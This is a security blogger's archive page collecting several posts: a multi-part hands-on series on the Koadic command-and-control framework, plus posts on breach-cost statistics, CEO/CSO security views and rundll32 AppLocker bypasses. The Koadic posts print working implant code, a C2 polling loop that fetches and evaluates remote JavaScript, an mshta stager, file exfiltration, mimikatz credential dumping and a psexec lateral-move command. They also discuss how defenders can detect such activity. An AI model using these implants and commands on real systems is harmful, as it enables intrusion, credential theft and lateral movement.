All posts by Andy Green

Koadic: Implants and Pen Testing Wisdom, Part III

One of the benefits of working with Koadic is that you too can try your hand at making enhancements. The Python environment with its nicely organized directory structures lends itself to being tweaked. And if you want to take the ultimate jump, you can add your own implants.

The way to think about Koadic is that it’s a C2 server that lets you deliver JavaScript malware implants to the target and then interact with them from the comfort of your console.

Sure, there’s a learning curve to understanding how the code really ticks. But I can save you hours of research and frustration: each implant has two sides, a Python module (found in the implant/modules directory) and the actual JavaScript (located in a parallel implant/data directory).

To add a new implant, you code up these two parts. And that’s almost all you need to know — I’ll get into a few more details below.
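To make this concrete, here’s roughly how the two halves of a new implant would sit in the source tree. The module name and exact paths are my own illustration, based on the parallel directories just mentioned:

implant/modules/my_implant.py    (the Python side, loaded by the Koadic console)
implant/data/my_implant.js       (the JavaScript that actually runs on the target)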

So what would be a useful implant to aim for?

Having already experienced the power of PowerView, the PowerShell pen-testing library for querying Active Directory, I decided to add an implant to list AD members for a given group. It seemed like something I could do over a few afternoons, provided I had enough caffeine.

Active Directory Group Members a la Koadic

As I’ve been saying in my various blog series, pen testers have to think and act like hackers in order to effectively probe defenses. A lot of post-exploitation work is learning about the IT landscape. As we saw with PowerView, enumerating users within groups is a very good first step in planning a lateral move.

If you’ve never written JavaScript to access Active Directory, you’ll find oodles of online examples showing how to set up a connection to a data source using the ADODB object — for example, this tutorial. The trickiest part is fine-tuning the search criteria.

You can either use SQL-like statements, or else learn the more complex LDAP filter syntax. At this point, it’s probably best to look at the code I cobbled together to do an extended search of an AD group.

// Open an ADO connection to Active Directory via the ADsDSOObject provider
var objConnection = new ActiveXObject("ADODB.Connection");
objConnection.Provider = "ADsDSOObject";
objConnection.Open("Active Directory Provider");

var objCommand = new ActiveXObject("ADODB.Command");
objCommand.ActiveConnection = objConnection;  // the original snippet omitted this; Execute() needs it

Koadic.work.report("Gathering users ...");

// LDAP dialect query: <base>;(filter);attributes;scope
// strDomain (the domain's DN, e.g. dc=acme,dc=corp) is set earlier in the implant
var strDom = "<LDAP://" + strDomain + ">";
var strFilter = "(&(objectCategory=person)(objectClass=user)(memberOf=cn=~GROUP~,cn=Users," + strDomain + "))";  // Koadic replaces ~GROUP~ with the info field
var strAttributes = "ADsPath";

var strQuery = strDom + ";" + strFilter + ";" + strAttributes + ";Subtree";

objCommand.CommandText = strQuery;

// Walk the result set, collecting each user's ADsPath
var objRecordSet = objCommand.Execute();
objRecordSet.MoveFirst();
var user_str = "";
while (!objRecordSet.EOF) {
    user_str += objRecordSet.Fields("ADsPath").value;
    user_str += "\n";
    objRecordSet.MoveNext();
}
Koadic.work.report(user_str);
Koadic.work.report("...Complete");

I wanted to enumerate the users found in all the underlying subgroups. For example, in searching Domain Admins, the query shouldn’t stop at the first level. The “Subtree” parameter above does the trick. I didn’t have the SQL smarts to work this out in a single “select” statement, so the LDAP filters were the way to go in my case.
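For the curious, the SQL-like dialect accepted by the ADsDSOObject provider looks something like the sketch below. I didn’t test this variant, and it doesn’t handle the subgroup requirement, so treat it as illustrative only:

objCommand.CommandText = "SELECT ADsPath FROM 'LDAP://" + strDomain + "' " +
    "WHERE objectCategory='person' AND objectClass='user'";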

I tested the JavaScript independently of Koadic, and it worked fine. Victory!

There’s a small point about how to return the results to the C2 console. Koadic solves this nicely through its own JS support functions. There’s a set of these that lets you collect output from the JavaScript and then deliver it over a special encrypted channel. You can see me doing that with the Koadic.work.report function, which I added to the original JavaScript code.

And this leads nicely to the Python code — technically the client part of the C2 server. For this, I copied and adjusted an existing Koadic implant, which I’m calling enum_adusers. You can view a part of my implant below.

import core.implant
import core.job
import uuid

class ADUsersJob(core.job.Job):
    def done(self):
        self.display()

    def display(self):
        if len(self.data.splitlines()) > 10:
            self.shell.print_plain("Lots of users! Only printing first 10 lines...")
            self.shell.print_plain("\n".join(self.data.splitlines()[:10]))
            save_file = "/tmp/loot." + self.session.ip + "." + uuid.uuid4().hex
            with open(save_file, "w") as f:
                f.write(self.data)
            self.shell.print_good("Saved loot list to " + save_file)
        else:
            self.shell.print_plain(self.data)

To display the output sent by the JavaScript side of the implant to the console, I use some of the Python support provided by Koadic’s shell class — in particular, the print methods. Under the hood, Koadic scoops up the data sent by the JavaScript code’s report function and displays it to the console.

By the way, Koadic conveniently allows you to reload modules on the fly without having to restart everything! I can tweak my code and use the “load” command in the Koadic console to activate the updates.

My very own Koadic implant. And notice how I was able to change the code on the fly, reload it, and then run it.

I went into detail about all this, partly to inspire you to roll your own implants, but also to make another point. The underlying techniques that Koadic relies on — rundll32 and mshta — have been known to hackers for years. What Koadic does is make all this hacking wisdom available to pen testers in a very flexible and relatively simple programming environment.

Some Pen Testing Wisdom

Once you get comfortable with Koadic, you can devise your own implants, quickly test them, and get to the more important goal of pen testing — finding and exploring security weaknesses.

Let’s just say I’m really impressed by what Sean and Zach have wrought, and Koadic has certainly sped up my understanding of the whole testing process.

For example, a funny thing happened when I first went to try my enum_adusers implant. It failed with an error message reading something like this: “Settings on this computer prohibit accessing a data source on another domain.”

I was a little surprised.

If you do some googling, you’ll learn that Windows’ Internet security controls have a special setting that allows browser scripts to access data sources. And in my AWS testing environment, the Amazon overlords wisely made sure that this was disabled for my server instance, which, it should be noted, is certainly not a desktop environment. I turned it on just to get my implant to pull in AD users.

Gotcha! Enabling “Access data sources across domain” allowed my implant to work. But it’s a security hole!

Why was the JavaScript I coded for the Koadic implant being treated as if it were a browser-based script, and therefore blocked from making the connection to Active Directory?

Well, because technically it is running in a browser! As I mentioned last time, the Koadic scripts are actually executed by mshta, which is Microsoft’s legacy technology for running HTML-based internal business apps.

The real pen testing wisdom I gained is this: if this particular script runs, it means the remote data source security control is enabled, which is not a good thing, even (and perhaps especially) on a server.

Next time, I’ll wrap up this series and talk about defending against the kinds of attacks that Koadic represents — stealthy script-based malware.

CEO vs. CSO Data Security Mindsets, Part I

If you want to gain real insight into the disconnect between IT and the C-levels, then take a closer look at the Cyentia Institute’s Cyber Balance Sheet Report, 2017. Cyentia was founded by the IOS blog’s favorite data breach thinker and statistician, Wade Baker. Based on surveying over 80 corporate board members and IT executives, Cyentia broke down the differing data security viewpoints between CSOs and the board (including CEOs) into six different areas.

The key takeaway is that it’s not just that IT doesn’t speak the same language as the business side, but also that the business executives and IT view and think about basic security ideas, values, and metrics differently. It’s important to get everyone on the same page, so I applaud Cyentia for their efforts.

The report and its findings were the inspiration — thanks Wade — behind this IOS blog mini-series. It’s my modest attempt to bridge the viewpoint gap. (And after that, I’ll take on world peace.)

In this first post, we’ll look at some of the Cyber Balance Sheet’s intriguing results and observations. In the second and third posts, I’ll attempt to act as couples counselor, and explain ideas that one side needs to know about the other.

When Worlds Collide

Let’s look first at one of the more counter-intuitive results that I discovered in the report.

Cyentia asked both CSO and board subjects to rate the value of cybersecurity to their business in five different categories: security guidance, business enabler, loss avoidance, data protection, and brand protection (see chart below).

Source: Cyber Balance Sheet Report, 2017 (Cyentia Institute)

Yeah, I’m a little surprised that data protection was rated as valuable by under 30% of CSOs, but by over 80% of board members. Maybe I’m a crazy idealist, but you’d think that would be job #1 for CSOs!

The explanation from Cyentia on this point is worth noting: “CSOs of course knows that data protection lies in their purview … and so they’ve learned to position data protection as a business enabler [rather] than a cost center.”

I think what Cyentia is getting at is that CSOs feel strongly that they bring real value to their business and not just red ink — not just providing a data protection service. And that jibes with the fact that 40% of CSOs say they are business enablers, although that belief is not shared equally by the board: only 20% of them think that.

The key to all this is the difference in the breakdown on the “brand protection” value: over 60% of board members saw this as important, but it barely made a blip with CSOs, at less than 20%.

I’m not surprised that CSOs don’t see their job as being the brand police. I don’t necessarily blame them. I can almost hear them screaming “I’m an IT professional not a brand champion.”

But let’s look at this from a risk perspective, which is the viewpoint of CEOs and boards. As one of the board-level interviewees put it in the report, their biggest concern is the legal and business implications of a data breach. They know a data breach or an insider attack can have serious reputational damage, leading to lost sales and lawsuits, which all work out to hard dollars. Brand damage is very much a board-level issue!

Ponemon, of course, has been tracking both the direct and enormous indirect costs involved in breach incidents with its own reports over the years, and recent news only adds to the evidence.

Cyentia has identified an enormous gap between what CSOs and boards think is important regarding the value of cybersecurity. This leads nicely to another result of theirs related to security metrics.

Let’s Talk About Risk

The metric measurements in the report (see section 4) are also revealing and detail more of this diverging viewpoint. Of course, CSOs are focused on various IT metrics, particularly related to security incidents, responses, governance, and more.

Now that’s a disparity! CSOs underplay the importance of risk. (Source: Cyentia Institute)

Cyentia tells us there’s a rough balance between both sides for many of the IT metrics. However, there’s a large gap between CSOs and boards over the importance of “risk posture” metrics. It’s mentioned by 80% of boards versus only 20% of CSOs. That’s a startling disparity.

What gives?

IT loves operational security metrics: the ones mentioned above along with lots of details about day-to-day operations, involving patching status, malware or virus scanner stats, and more.

But that’s not what board members, who may not be as technically knowledgeable in a narrow IT sense, think is important for their work!

These folks have enormous experience running actual businesses. CEOs and their boards, of course, need to plan ahead, and these savvy business pros expect there to be uncertainty in their plans. That comes with the territory.

What they want from IT is a quantification of how bad the outcome of a breach, insider attack, or accidental disclosure can get in dollars, and the frequency or probability that these events could happen.

You can think of them as disciplined high-tech gamblers who know all the probabilities of each outcome and place their bets accordingly. Pro tip: they’re probably great poker players.

For Next Time

If you want to get ahead of the game, take a look at Evan Wheeler’s presentation at this year’s RSA conference. Evan is a CISO and risk management expert. If you want to understand what a risk profile is, check out his explanation at around the 25-minute mark.

His key point is that business leaders are interested both in rare cybersecurity events that incur huge losses – think Equifax – and in more likely events that typically have far lower costs – say, spam mail used to grab corporate credit card numbers in the travel department. They have different ways of dealing with each of these outcomes.

We’ll get a little more into the weeds next time when we look at “exceedance probabilities”, which are basically a more quantified version of a risk profile. It’s a great topic, and one that CSOs should become more familiar with.

There are other interesting stats in the Cyentia report – blow your mind by perusing the chart showing different perspectives on security effectiveness. I urge you to download it for yourself and spend time mulling over the fine points. It’s well worth the effort.

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Mshta and rundll32, the Windows binaries that Koadic leverages, have long been known to hackers. If you take a peek at MITRE’s ATT&CK database, you’ll see that rundll32 has been the basis for attacks stretching back years. Pen-testing tools such as Koadic have formalized established hacking wisdom, thereby helping IT people (and bloggers) understand threats and improve defenses.

I’ll add that it makes sense to also take a deeper dive into Koadic’s design to gain even more insights into possible defense strategies. With that in mind, let’s go over a few ideas from last time.

Playing Pen Tester (and Blue Teamer)

We saw how Koadic, like all command and control (C2) servers, lets us send commands from its console to the targeted computer, where a small-footprint JavaScript shell (more on that below) launches the actual Windows commands.

As a pen tester, one of the first things you want to learn is whether there’s interesting data that you can access and then copy or exfiltrate. For my pretend AWS environment, you can see below how I used legacy findstr to zoom into a file containing sensitive data.

I then used implant/util/download_file to bring it back home.

Switching to my “blue team” persona, let’s now take a quick look at the Windows Event logs.

To begin to understand what’s happening, I enabled very granular logging. I was doing this for educational purposes — and isn’t this what pen testing is about? — but you may not be able to depend on detailed logs in real-world post-exploitation analysis. However, as we’ll soon see, Koadic does leak information into the file world — it’s not completely fileless. And this provides an opening for a different kind of defense.

The first interesting log entry is one showing rundll32 pulling in a remote script – which I discussed back in my LoL series. This is not, clearing throat, a standard use of this utility, and should raise flags. By the way, Windows Defender (in Windows 10) can spot some of the dark uses of this LoL-ware.

And then a little further on in the log is this revealing entry:

This should raise suspicions: indirect execution of a command coupled with redirection of output.

Of course, this is the result of the findstr command that I previously sent to my zombie. The larger point is that it’s being run indirectly, via the launching of a cmd shell that then runs findstr. That’s what happens when you run a shell command within JavaScript: you use ActiveX to create a shell session and then pass it the command, something like this:

var r = new ActiveXObject("WScript.Shell").Run("findstr /I private C:\\VIPs");

Did you notice the 1> and 2>&1 part of the command in the log entry? Those of us of a certain vintage immediately recognize the Unix/Linux-style syntax for directing standard output to a file and redirecting standard error to standard output.

Sure, there are legit reasons for doing all this, but it’s also the way you would relay output from a command (launched by malware) back to the attacker’s server — save it to a file, read the file, and then delete it. This is in fact what Koadic does.
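Here’s a minimal sketch of that relay pattern in JavaScript. It’s my own simplified reconstruction, not Koadic’s actual code, and the temp file path is made up:

// Run a command, capture its output in a temp file, read it back, then clean up
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tmp = "C:\\Windows\\Temp\\out.txt";  // hypothetical path

shell.Run("%comspec% /q /c findstr /I private C:\\VIPs 1> " + tmp + " 2>&1", 0, true);

var stream = fso.OpenTextFile(tmp, 1);  // 1 = ForReading
var output = stream.ReadAll();
stream.Close();
fso.DeleteFile(tmp);  // remove the evidence
// output would then be relayed back to the C2 server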

Detailed event logging, though potentially containing useful information, may not always be available. But it doesn’t matter! If you can relate these short bursts of file creation and deletion activity to access to executable files that are rarely visited by the user, such as rundll32, and to the copying of files containing sensitive information, then you’re on the way to detecting and stopping an attack.

In short: malware often generates a little bit of file noise, and it can be detected by security defenses that are capable of monitoring abnormal file activity on a per-user basis.

Real-World Pivots With Koadic

Last time, I began to show you how to configure Koadic for a lateral move or pivot. Let’s finish this up and do a real pivot.

Assuming there are other domain credentials available, Koadic provides the implant/inject/mimikatz_dynwrapx module to pull out the cached hashes and, when possible, actual passwords. If you then enter the creds command, you can reference the credentials using a numeric identifier.

With Koadic’s credential id number, I can pass the hash (or password) to psexec.

Let’s assume I’ve learned that masa is another server in the acme.corp domain, and that I’m using the credentials of the user named lex. I’m now ready to run implant/pivot/exec_psexec.

I set the pathname to the psexec executable, which I previously uploaded, provided the credid of lex’s credential, and for the remote command to execute, I supplied the initial mshta stager that landed me on the victim’s computer. You leapfrog to the next computer by simply implanting another Koadic JavaScript client.

That should have been enough to get this started.

But … Koadic didn’t seem to properly pull the fully qualified domain name of the credential from the cache, so I had to tweak the JavaScript code. I was forced to override the cached domain information with whatever was explicitly configured through the set command.

My headaches didn’t end there: my lateral move was initially blocked. Psexec experts probably know this, but I learned the hard way that you have to provide the -h option for “elevated credentials” (even if you already have the plaintext password). More code changes.
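Putting it all together, the command Koadic effectively runs on the victim looks roughly like this (the account, password, and stager URL here are made up; the real values come from the creds cache and the stager):

psexec.exe \\masa -u "acme.corp\lex" -p Password123! -h -accepteula mshta http://10.0.0.5:9999/nMEmw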

Pivoting with Koadic: same mshta stager, different target.

On the bright side, Koadic’s script-based environment makes code updates relatively painless. Note to Sean and Zach: I think you need to take a closer look at the exec_psexec implant.

Once psexec runs successfully with the mshta payload, Koadic establishes another zombie. (Yes, that’s quite a sentence.)

I now had two zombies: one controlling pepper.acme.corp, my initial target, and the second one handling masa.acme.corp. I’m now a zombie master!

To communicate with the new zombie, I just needed to make sure I set the appropriate zombie number, and then run the command. You can see my zombie sorcery below:

I now control two zombies! How many can make that same boast?

Diving Into the Koadic Kode and Kraziness

I will be merciful and end this post soon enough! Before we break until next time, I wanted to start a dive into Koadic’s architecture. It’s helpful – I think – in terms of really understanding your pen testing and in getting insights into real-world post-exploitation malware.

The one word that describes Koadic (and other malware creations) is obfuscatory. There’s nothing straightforward about the way it runs commands. Some of this is intentional, to throw off the defense, but C2 environments are also inherently complicated.

I’ll go into this in more detail next time, but here’s the $.10 tour.

The mshta stager that pulls in the initial payload doesn’t hang around very long. It then launches rundll32, which loads the main Koadic client code. At this point, the client is in a loop waiting for commands from the Koadic server – the client console that I showed above.

Showing a small part of the client-side JavaScript pulled in by rundll32. You can see the code for launching a Windows command sent from the Koadic C2 server. Note the encasing HTA.

Once it receives a command, say to execute “ipconfig”, the client side of Koadic acts like a Unix/Linux shell — forking and execing commands. In our case, the Koadic client launches another rundll32 whose sole function is to connect back to the Koadic server and pull in specially served-up JavaScript — essentially the ActiveX code to launch a Windows shell session to run ipconfig. This child rundll32 is transient, exiting after it completes its execution of a single command and leaving the parent rundll32 to carry out the next commands.

Basta, for now!

If you’re looking for a homework assignment, you should study this section of Koadic’s GitHub. Hint: stdlib.js forms the core of the Koadic client.

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Part I

In my epic series on Windows binaries that have dual uses – talkin’ to you, rundll32 and mshta – I showed how hackers can stealthily download and launch remote script-based malware. I also mentioned that pen testers have been actively exploring the living-off-the-land (LoL) approach for post-exploitation. Enter Koadic.

I learned about Koadic sort of by accident. For kicks, I decided to assemble a keyword combination of “javascript rundll32 exploitation” to see what would show up. The search results led me to the Koadic post-exploitation rootkit, which according to its description “does most of its operation using Windows Script Host.” I was intrigued. By the way, Koadic is hacker-ese for COM Command and Control.

A good starting point for learning about Koadic is a Defcon presentation given by its two developers, Sean Dillon and Zach Harding. Koadic looks and acts like PowerShell Empire with script-based stagers and implants. The key difference, though, is that Koadic instead relies on JavaScript and VBScript on the victim’s computer.

As they note in their presentation, IT defenders are now more attuned to the fact that PowerShell can be used offensively. In other words, security teams are looking for unusual PS activity in the Windows event logs. They are not as focused (yet) on scripts run by the Windows Script Host engine. And that was some of the inspiration behind Koadic, which I suppose can be called JavaScript Empire.

Microsoft has also helped matters by adding PowerShell-specific logging capabilities, a topic I explored in my amazing mini-series on obfuscation techniques.

Defenders can selectively turn on PS logging. They cannot do the same for JavaScript.

To log scriptware (other than PowerShell), Windows forces you to enable auditing of every process launched. Eeeks.

To analyze Koadic’s script activity, you have to bite the bullet and enable detailed logging, which results in an entry for each process launched in Windows. Let’s just say the Windows log ain’t a pretty place after that’s done, and this event fog helps hide Koadic’s activities.

Start Me Up With a Mshta Stager

Thankfully, I had malware analysis help from our amazing NYC-based summer intern, Daniel Vebman, who sanity checked my ideas and did some valuable exploring of his own.

In this first post, let’s take a shallow dive into Koadic’s capabilities and architecture. One of the major themes to keep in mind with Koadic is that its script-based approach gives the attackers the ability to change code on the fly, and adapt quickly to new environments.

How do you detect stealthy post-exploitation activities of Koadic-style attacks in the real world? I’ll come to that later on in the series, but clearly you’ll need to move beyond the Windows event log and, ahem, focus on the underlying file system.

To get started, we installed the software from GitHub on an Ubuntu instance in our AWS environment. We hit a few snags, but these were quickly solved by the ever-resourceful Daniel, who reinstalled Koadic’s Python modules (and did it right).

Yes, the server-side of Koadic is Python-based.

To do its work, Koadic leverages Windows binaries that sneakily pull in remote JavaScript or VBScript. Essentially, these are the ones I covered in my living-off-the-land series: mshta, rundll32, and regsvr32. It appears from reading the notes, though, that only mshta works, so that’s the stager we used in our testing.
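When you generate a stager, Koadic hands you a one-liner to run on the target. It’s something of roughly this shape, with a made-up address and endpoint:

mshta http://10.0.0.5:9999/nMEmw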

Let’s assume the mshta stager was delivered to a victim via, say, a phish mail. Once activated, Koadic then creates a “zombie”. It’s their way of saying it has control over the victim’s machine. The zombification — it’s a word — is accomplished through a library of JavaScript-based implants.

Night of the Koadic Zombie!

In a realistic pen-testing scenario, the first task is to answer the who and where questions. After all, the payload has landed somewhere on the laptop or server of a random user in the Intertoobz.

Koadic’s implant/manage/exec_cmd does as advertised: lets you run individual shell commands remotely. As with all the implants, you enter the “info” command to see what the basic parameters are and then set them accordingly.

Who am I? Where am I? All of life’s — and a pen tester’s — basic questions can be answered by running shell commands remotely.

For exec_cmd, I had my zombie execute whoami, hostname, and ipconfig on my pretend victim’s computer — a Windows Server 2012 instance in my AWS environment.

Let’s Look Around

Once you have the basics, it’s then helpful to discover the fully qualified domain name (FQDN) of the Windows environment you’ve landed in. As we’ll see, you’ll need the domain name to move off the initially hacked computer.

For that, I resorted to PowerShell, setting the cmd parameter to call GetHostByName($env:computerName). It’s a benign PowerShell call, so in theory it shouldn’t raise any eyebrows if it’s logged.

Getting the domain name through a PowerShell cmdlet.

What about scanning the network to learn about IP addresses?

That’s where implant/scan/tcp comes into play. There’s also the implant/gather/user_hunter to discover users who are currently logged in.

In short: Koadic has built-in support for getting essential environmental information and, of course, the ability to run shell commands to fill in the gaps. By the way, a description of all its commands can be found on the Github home page.

Doing the Psexec Pivot

Unless a hacker is very lucky and lands on a server holding millions of unencrypted credit card numbers, she’ll need to leapfrog to another computer. The way this is done is to harvest domain-level credentials, eventually find one with elevated permissions, and then perform a lateral move.

Once upon a time, I wrote about how to use mimikatz and psexec to do just that. Koadic has conveniently provided a mimikatz-based implant to retrieve credentials from LSASS memory and another one to support psexec. Small quibble: you have to explicitly upload the psexec executable to the victim’s computer and set the path name.

For example, to retrieve credentials I ran implant/inject/mimikatz_dynwrapx:

Koadic’s mimikatz dll shows NTLM hashes and even the password, thanks to the wdigest security hole.

You can see the NTLM hashes, which you can crack offline if need be. But because of the infamous wdigest security hole, you also get the plain text passwords. Eureka!

I won’t show how to do an actual lateral move or pivot in this post, but you can see the setup for implant/pivot/exec_psexec below:

By the way, you get the credid number from the creds command. It will automatically PtH for you!

I’ll explain next time how to do a real-world pivot by filling in the cmd parameter with the initial mshta stager, thereby creating another zombie. The idea is to continue the pattern of harvesting credentials with mimikatz and then pivoting. Yeah, you end up controlling an army of zombies. Evil!

A Little JavaScript Plumbing

That’s the quick $.50 tour of Koadic. One last bit of business is a high-level view of the architecture.

Koadic is essentially a remote access trojan or RAT. Nowadays, we give it the fancier name of a command and control (C2) server. In any case, the principles are easy enough to grasp: the client side executes the commands from the remote server.

In the case of Koadic, the client side is not a binary — as it was for the early RATs — but instead 100% JavaScript. The client’s sole function is to loop, pull in remote implants — written in either JavaScript or VBScript — from Koadic’s Python-based server, run them, and send the results back.
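Conceptually, the client boils down to something like the sketch below. This is my own drastic simplification, not Koadic’s actual code: it’s written as if it ran under cscript (where WScript.Sleep exists), and the C2 URL is made up.

// Poll the C2 server for work, run whatever JavaScript comes back, repeat
while (true) {
    var http = new ActiveXObject("MSXML2.XMLHTTP");
    http.open("GET", "http://c2.example.com/job", false);  // synchronous request
    http.send();
    if (http.status == 200 && http.responseText != "") {
        eval(http.responseText);  // execute the implant served by the C2
    }
    WScript.Sleep(5000);  // wait five seconds before polling again
}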

By the way, there’s some clever programming in Koadic wherein the server-side Python crafts the actual JavaScript implant. I’ll get into more details further on in the series.

Let me draw back the curtain to remove some of the mystery around the implants. Here’s the raw JavaScript in Koadic that actually launches psexec:

try
{
    var rpath = "~RPATH~";
    var UNC = "~RPATH~\\psexec.exe ";
    var domain = "~SMBDOMAIN~";
    var user = "~SMBUSER~";
    var pwd = "~SMBPASS~";
    var computer = "\\\\~RHOST~ ";

    UNC += computer;

    if (user != "" && pwd != "")
    {
        if (domain != "" && domain != ".")
        {
            user = '"' + domain + "\\" + user + '"';
        }

        UNC += "-u " + user + " -p " + pwd + " ";
    }

    UNC += " -accepteula ~CMD~";

    // crappy hack to make sure it mounts
    var output = Koadic.shell.exec("net use * " + rpath, "~DIRECTORY~\\~FILE~.txt");

    if (output.indexOf("Drive") != -1)
    {
        var drive = output.split(" ")[1];
        Koadic.shell.run("net use " + drive + " /delete", true);
    }

    Koadic.WS.Run("%comspec% /q /c " + UNC, 0, true);

    Koadic.work.report("Complete");
}
catch (e)
{
    Koadic.work.error(e);
}

Yeah, those tilde-encased variables are replaced with the real thing before the script is shipped off to the target system.

The key point is that this is a flexible environment. In fact, this infosec blogger (and former UNIX programmer) successfully made a few tweaks to the psexec data module to get it to work in our AWS environment.

Note to Sean and Zach: I think there are issues in the way a fully qualified domain name is parsed by the mimikatz implant. Just sayin’.

For Next Time

I’ll cover this material again, do an actual psexec pivot, and get deeper into my pen-testing persona. I’ll also analyze the events produced by Koadic so that we can see that it ain’t so easy to detect unusual activity from the raw logs.

One last thought: wouldn’t it be great for pen testing purposes if we were able to wangle Koadic into pulling in Active Directory information, say domain groups and their members? Kind of like what PowerView does.

Hold that thought, and next time we’ll also start on the task of creating our own implants. In the meantime, if you want to get ahead of the curve, you might want to study the Koadic modules in Github.


Ponemon and NetDiligence Remind Us Data Breach Costs Can Be Huuuge!

Those of us in the infosec community eagerly await the publication of Ponemon’s annual breach cost analysis in the early summer months. What would summer be without scrolling through the Ponemon analysis to learn about last year’s average incident costs, average per record costs, and detailed industry breakdowns? You can find all this in the current report. But then Ponemon did something astonishing.

The poor souls who made it through my posts on breach cost stats learned that the datasets used here are not normal. I mean that literally: they don’t correspond to a standard normal or bell curve. We also know from more in-depth studies that the data points are skewed with “heavy tails”, and are more accurately represented by power laws.

What does that have to do with Ponemon’s cost analysis?

Ponemon has avoided the issues of dealing with skewed data by lopping off the outliers — they don’t look at breach incidents above 100,000 records. Sure, you lose some information, but then the stats are more meaningful to the companies — most of them — that don’t live in the long tail of the curve.

Monster Breaches Are Costly. Very Costly.

Brace yourself. For 2018, Ponemon started looking at the dragon’s tail. They’ve included an analysis of mega data breaches involving incidents of over one million records.

First, let’s get the bad news out of the way. Since Ponemon only had 11 companies in their mega breach sample, they had to perform, gulp, a Monte Carlo analysis. That’s a fancy way of saying they were forced to make guesses about a few of the parameters in their model, which are then randomly “sampled” to generate the cost estimates.

The more important point is that in their graph below of breach costs vs. records stolen, the data points show a sub-linear (or, more technically, log-linear) relationship — the costs grow slower than a straight line. Double the number of records stolen, and the total breach cost is less than double.

Breach costs grow slower than a straight line. (Source: Ponemon, 2018)
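If you like a little math with your breach stats, that claim amounts to a power-law fit of roughly this form (the constant and exponent are illustrative; the point is just the shape of the curve):

cost ≈ c × (records)^b, with b < 1

So doubling the record count multiplies the total cost by 2^b, which is less than 2.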

And that’s exactly what other researchers have seen with breach costs. I also pointed this interesting factoid out in my breach cost series — you can learn more here.

For CFOs and CIOs, there’s a drop of good news in this slow-growing curve: it means that the cost per record drops as more records are involved.

For a data theft of 20 million records, the graph above indirectly tells us the average cost is about $18 per record, and at 50 million records, the per record cost decreases to about $7.

I suppose that may sound benign when quickly said in a presentation, but on the other hand … the total cost for a 50 million record theft is over $350 million.

And that’s something no board of directors wants to hear!

NetDiligence: Real-World Verification

While Ponemon’s theoretical analysis of mega breach costs is interesting, there is a dataset that sheds more light on real-world costs of these huge breaches. This comes to us courtesy of NetDiligence, a data risk analysis firm that has obtained access to actual claims data processed by cyber-insurance companies.

I looked at NetDiligence’s latest report, covering the 2014 – 2017 period. It provides further validation that data breach costs at the high end are, indeed, expensive.

According to NetDiligence, the average breach cost for the 591 claims in their dataset was about $394,000. They also calculated a median cost of a mere $56,000. Hmmm, with 50% of the data or 245 claims above $56K, there have to be monster incidents to explain the fact that the average is about seven times higher than the median. This is the sign of a non-normal dataset — the heavy-tailed curve that we typically see with breach stats.

I can do a quick back-of-the-envelope analysis to give you a better sense of mega costs lurking in the NetDiligence stats. Feel free to skip this next part if doing a multiplication with an average makes you slightly nauseous.

The total breach cost in the claims dataset is about $233 million (591 x $394,000). There’s a negligible amount of the total cost below the median – at most 56,000 x 246, or about $14 million. That leaves $219 million in costs above the median, which is then spread out over 245 claims. That means the upper 50% has an average cost of at least $890,000.

If you make some other assumptions – similar to what I did here — you quickly get to breach incidents in the millions of dollars for the top percentiles.

Anyway, NetDiligence doesn’t give away too many details about individual breach incidents in their analysis. But further down in the report, they reference some of the extreme costs in their claims dataset. This shows up in a table that breaks down costs by business size.

There are some monster incidents hidden in this table: $11 million, $15 million, and $16 million. (Source: NetDiligence)

If you look at the “Max” column, you can see that there are several incidents above $10 million. That ain’t chicken feed.

One Last Thing

It’s worth mentioning that Ponemon also includes indirect costs for incidents, based heavily on customer churn. This cost doesn’t show up in the cyber insurance claims data, which covers hard costs — legal fees, fines, credit monitoring, remediation efforts, etc.

In other words, Ponemon’s incident cost analysis will always trend significantly higher than the numbers from actual insurance claims. Ponemon’s cost numbers, though, are probably closer to the real-world cost, particularly for larger companies, and especially for public companies, where breach incidents can affect overall valuations. For example, Yahoo.

The key takeaway is that the headline-making breach incidents (Equifax, Yahoo, etc.) tell us about the very far end of the cost tail. The NetDiligence report in particular proves that there are still expensive data breaches, in the tens of millions of dollars, living in the middle of the tail. And these are likely less publicized, and more typically experienced.

I’ll have more to talk about for both the Ponemon and NetDiligence reports in a future post.

The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips

When we left off last, I showed how it’s possible to run VBScript directly from mshta. I can play a similar trick with another LoL-ware binary, our old friend rundll32. Like mshta, rundll32 has the ability to evade the security protections in AppLocker. In other words, hackers can leverage a signed Windows binary to run handcrafted scriptware directly from a command line even though AppLocker officially prevents it. Evil.

Oddvar Moe, one of this blog’s favorite security bloggers, has studied the LoL workarounds to AppLocker. In my own experimenting, I was able to confirm that rundll32 can avoid AppLocker’s security defenses.

For example, AppLocker blocked direct execution of a line of JavaScript to pop up an alert message, but when I fed the same one-liner directly into rundll32, it ran successfully.

AppLocker is not perfect.

I also gave rundll32 slightly more complicated JavaScript that pulls in a remote object and executes it using GetObject, similar to what I did last time with mshta. It ran flawlessly even though AppLocker disabled scripts.

AppLocker can’t stop rundll32 from running a remote COM object.

As before, I had enabled more granular auditing. I took a peek at the event logs, and thankfully Windows logs the complete command line when the JavaScript is passed directly to rundll32. That’s good news for security defenders.

You can turn on granular logging in Windows to see command line details. Beware: you’re flooded with event details.

Where Is This Going? Lol-Ware Post-Exploitation!

These LoL-ware binaries have incredible abilities to run scripts stealthily. And one would think that pen testers would be working out some post-exploitation tools based on this idea. One of the advantages of using scripting languages other than PowerShell is that IT security groups are not necessarily focused on, say, JavaScript.

This was some of the inspiration behind Koadic, which is a command and control (C2) environment, or, as it’s more familiar to us, a remote access trojan or RAT. Koadic allows security testers to open up a reverse shell, dump hashes, pivot using PtH techniques, retrieve files, and run arbitrary commands.

LoL and RAT had a love child, and they called it Koadic. Note the mshta stager.

In the above graphic showing the Koadic environment, you can see that it leverages mshta as a payload launcher to get a foothold on the target computer.

The idea is that the attacker takes the “stager” — the mshta code with the URL — and then embeds it, as we saw, directly in an HTA file or in an Office document’s macros, which are executed when the document is opened.

I’ll be delving more deeply into Koadic in a future post. And I’ll be proving that a corporate IT security group is no match for a capable high-school student. Stay tuned.

Defense Anyone?

AppLocker can’t completely disable script execution, but you can resort to simply turning off the Internet spigot by using Windows Firewall. I showed you how to block outbound traffic for a specific binary here.

